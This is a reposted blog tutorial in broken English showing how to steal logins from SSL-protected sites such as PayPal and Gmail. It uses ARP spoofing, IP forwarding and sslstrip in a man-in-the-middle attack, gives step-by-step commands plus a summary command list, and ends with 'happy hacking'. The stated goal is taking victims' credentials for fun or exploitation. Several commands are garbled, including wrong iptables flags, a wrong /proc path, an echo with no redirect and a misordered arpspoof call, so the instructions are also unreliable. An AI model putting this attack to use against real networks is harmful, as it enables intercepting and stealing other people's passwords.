Well if you are looking to trap some ssl password sets or any site that use ssl to encrypt traffic here is a small tut to help you with that this uses a tool or script call sslstrip. What this tool does it strips the ssl encryption from the traffic leaving you with a simple flow of text base network traffic. Then we take it to the next level which is a hackers best friend a very old method of hacking the MITM attack this way we tunnel the traffic between the victim and the server or the web server. now that we have both combine to help us to gain passwords and logins to ssl based site we can do most anything with the date we collect from it weather it be just having fun or exploiting the information. so lets get hoping on how to do this
(1) setup the iptables with the command below
>> iptables -t net -A PREROUTING -P tcp –destination-port 80 -j REDIRECT –to-port 8080
(2) setup the forwarding of the the trafic
>> cat /proc/sys/nat/ipv4/ip_forward
** after running this command you would ether get a 0 or 1 if you have a one then you dont have to worry about the next command but if you have a 0 then you need to change the vaule by 1 the next command will help you change that.
>> echo “1″ /proc/sys/nat/ipv4/ip_forward
this command will change the vaule to 1
ok once you have these ready you need to setup the up arp poisoning set with this we will use arpspoof the commandline interface.
cmdline>> arpspoof -i eth0 -t [target_IP] [Attacker_IP]
** target_IP : is the ip address of the target computer you would like to attack
Attacker_IP : is the ip address you your computer or the computer you are going to use for the
attack.
** IP example: ————————————–
000.000.000.000
192.168.1.1
202.205.170.36
————————————
(3) Setup the strip for the MITM
now because we have arpspoof running and also because we have forward all incoming to where ever it was ment to go we are now in the middle of all the traffic also meaning that we can see everything that pass through both computer. so lets look at a traffic chart of what is happening.
——————– ————————-
- - normal route – -
- VICTUM – >>>>>>>>>>>>>>>>>>>>>> - WEB-SERVER -
- 192.1.1.10 - - (SSL-en -
- - - 200.1.1.12 -
——————- ———————–
# ——————— #
# - – #
# ############>- ATTACKER -<###########
MITM route – 192.1.1.20 - MITM route
- -
———————-
//->arpspoof
//-> Ip_forwarding
//-> sslsrip
as seen in the diagram we see that since the attacker can see what is going through the line between the “VICTUM” and “WEBSERVER” he can do anything to you victum traffic even in put something to his traffic to the webserver but we are using sslstrip to strip the ssl encryption so that we can see the rough text password and username.
so what does sslstrip do for you well it actually preauthenticates you to the ssl server which means that the attacker authenticated for you meaning that your traffic from your computer if you are the victum is in clear text to the attacker. meaning that he can see every thing you are writing to the ssl server in clear readable text.
so now the command to make this happen is below
>> ./sslstrip.py -L 8080
once that is running the only thing the attacker needs to do is wait for you to goto a ssl site say paypal or hotmail or gmail or any service that host ssl support authentication.
once he thinks that he has waitted long enogh for data or somekind of log data to generate he will want to view the result.by default sslstrip generates a log file call sslstrip.log to view this file you can run the following command.
>>more sslstrip.log
now if it went well and if your victum login while you attack was going you should see some great stuff in your log file.
**********{summary commands}********************
———————————————————————————————–
1] >> iptables -t net -A PREROUTING -P tcp –destination-port 80 -j REDIRECT –to-port 8080
2] >> cat /proc/sys/nat/ipv4/ip_forward
3] >> echo “1″ /proc/sys/nat/ipv4/ip_forward
4] >> arpspoof -i eth0 -t [target_IP] [Attacker_IP]
5] >> ./sslstrip.py -L 8080
6] >> more sslstrip.log———————————————————————————————-
ok hope you have learn something happy hacking
本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/565116,如需转载请自行联系原作者
